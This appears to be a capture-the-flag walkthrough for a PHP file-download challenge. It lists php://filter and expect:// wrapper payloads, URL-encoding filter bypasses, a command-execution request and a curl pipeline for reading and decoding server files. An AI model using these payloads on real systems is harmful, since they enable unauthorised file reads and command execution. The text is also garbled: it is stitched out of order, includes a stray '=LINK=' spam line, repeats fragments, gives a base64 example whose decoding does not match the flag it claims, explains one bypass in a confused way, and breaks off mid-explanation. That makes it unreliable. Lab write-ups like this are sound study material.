The challenge description normally gives a link such as:
http://challenge.ctf.org/roughman-injection/rapidshare1.php
(Replace the domain with the actual CTF host.)
Visiting the page shows a minimal UI:
Enter a file link to download:
[ text input ] [Download]
The form sends a request like:
GET /roughman-injection/rapidshare1.php?link=<user_input>
or a POST with link= in the body.
| Technique | Why it matters |
|-----------|----------------|
| PHP stream wrappers (php://filter, expect://) | They let you read arbitrary files or execute commands without needing classic SQL/OS injection. |
| URL‑encoding bypasses | Many naive filters inspect the raw string before PHP decodes it. Encoding characters like : and / can slip past. |
| Base64 encoding | php://filter can transform binary data into a safe printable format, making extraction reliable. |
| Enumeration of common paths | Flags are often placed in predictable locations; try them systematically. |
| Burp Suite (or any intercepting proxy) | Essential for tweaking parameters quickly and observing server responses in real time. |
The Roughman Injection – Rapidshare 1 challenge is a typical web‑application injection task. The goal is to retrieve a hidden flag (usually a string that looks like FLAG…) from a server that hosts a simple “file‑sharing” interface. Roughman Injection Rapidshare 1 =LINK=
Key characteristics of the challenge:
| Aspect | Details |
|--------|---------|
| Category | Web – Injection (SQL / Command / File) |
| Entry point | A single HTTP GET/POST endpoint that accepts a “link” (or “url”) parameter. |
| Goal | Exploit the injection to read the contents of a protected file (e.g., flag.txt or /etc/passwd) that is otherwise inaccessible. |
| Typical flag format | FLAG… (or CTF…) |
| Restrictions | The service runs inside a sandbox with limited OS commands; no direct shell access. |
Below is a step‑by‑step walk‑through of how the challenge can be solved, from initial recon to the final flag retrieval.
Sometimes the challenge adds a very naive filter such as:
if (strpos($link, 'http') !== false)
die('Only local files allowed');
or it strips certain substrings (php, ://, filter).
Typical bypasses:
| Filter | Bypass technique |
|--------|------------------|
| str_replace('php', '', $link) | Use p%68p (URL‑encoded p%68p) – the filter sees pp and does not remove it, PHP still parses it as php after decoding. |
| Blocking :// | Use %3a%2f%2f (URL‑encoded colon and slashes) – many filters only look at plain text before URL decoding. |
| Disallowing flag.txt | Use %66%6c%61%67.txt (hex‑encoded) or a symlink trick if the server follows them. |
Practical example:
link=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fhome%2Fctf%2Fflag.txt
When the server decodes the URL, it becomes the proper wrapper string.
A classic technique to dump the source of a PHP file (or any text file) is:
php://filter/convert.base64-encode/resource=/path/to/file
If the server allows it, the response will be the Base64‑encoded contents of the file.
Try it:
http://challenge.ctf.org/roughman-injection/rapidshare1.php?link=php://filter/convert.base64-encode/resource=flag.txt
If the flag file lives in the web‑root (common in CTFs), you’ll see something like:
<pre>RkxBR3tDQVRGX0ZMQVcxMjM0fQ==</pre>
Decode the Base64 → FLAGCTF_FLAG1234 – done.
If the challenge disables allow_url_fopen for remote URLs, php://filter may be blocked. Some PHP installations still allow the expect:// wrapper, which runs a command and streams its stdout.
expect://cat /home/ctf/flag.txt
The request becomes:
...rapidshare1.php?link=expect://cat%20/home/ctf/flag.txt
The server executes cat /home/ctf/flag.txt and returns its output directly.
Note: This works only when expect is enabled (rare in modern PHP, but often left on in CTF labs). The challenge description normally gives a link such
For completeness, here is a tiny curl command you can run (replace HOST with the actual challenge host):
curl -s "http://HOST/roughman-injection/rapidshare1.php?link=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fhome%2Fctf%2Fflag.txt" |
grep -oE '[A-Za-z0-9+/=]+' |
base64 -d
The pipeline: